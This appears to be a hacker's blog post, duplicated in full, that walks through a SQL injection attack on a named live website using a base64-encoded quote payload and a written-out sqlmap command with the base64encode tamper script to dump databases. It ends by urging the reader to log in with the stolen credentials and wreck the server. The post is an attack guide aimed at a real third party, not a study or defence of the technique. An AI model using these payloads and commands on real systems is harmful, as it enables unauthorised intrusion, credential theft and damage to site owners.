SQL Injection base64encode
Hey guys its me HexLegend
Today Let me show you Sql injection attack
Yeah yeah I know everybody know that attack but let me show you something else
Target => http://www.nethomes.in
Sometime parameter is encoded in base64 and we have to encode our payload to exploit it
so what we need
Tools => HACKBAR,SQLmap [if you are too lazy like me]
Lets Start
as you see its 34
now our famous symbol (') and than encode it to base64encode by going to
Encoding in Hackbar
34'=MzQn
Ok now hit enter
Checking type of SQL injection
Now Open SQLmap
and Lets start
"C:\lolz>sqlmap.py -u http://target.com/page.php?id=MzQ= --dbms=My
sql --random-agent --tamper=base64encode.py --technique=E --dbs"
Now you Get Login credential
Login and F**k the server
Greets
================
Not want to greet specific person because all of you are my bro's
Take care and please pray for me i am preparing for CSS exam
Remember me in you prayers
================
HexLegend :)
Hey guys its me HexLegend
Today Let me show you Sql injection attack
Yeah yeah I know everybody know that attack but let me show you something else
Target => http://www.nethomes.in
Sometime parameter is encoded in base64 and we have to encode our payload to exploit it
so what we need
Tools => HACKBAR,SQLmap [if you are too lazy like me]
Lets Start
as you see its 34
now our famous symbol (') and than encode it to base64encode by going to
Encoding in Hackbar
34'=MzQn
Ok now hit enter
Checking type of SQL injection
Now Open SQLmap
and Lets start
"C:\lolz>sqlmap.py -u http://target.com/page.php?id=MzQ= --dbms=My
sql --random-agent --tamper=base64encode.py --technique=E --dbs"
Now you Get Login credential
Login and F**k the server
Greets
================
Not want to greet specific person because all of you are my bro's
Take care and please pray for me i am preparing for CSS exam
Remember me in you prayers
================
HexLegend :)
0 comments:
Post a Comment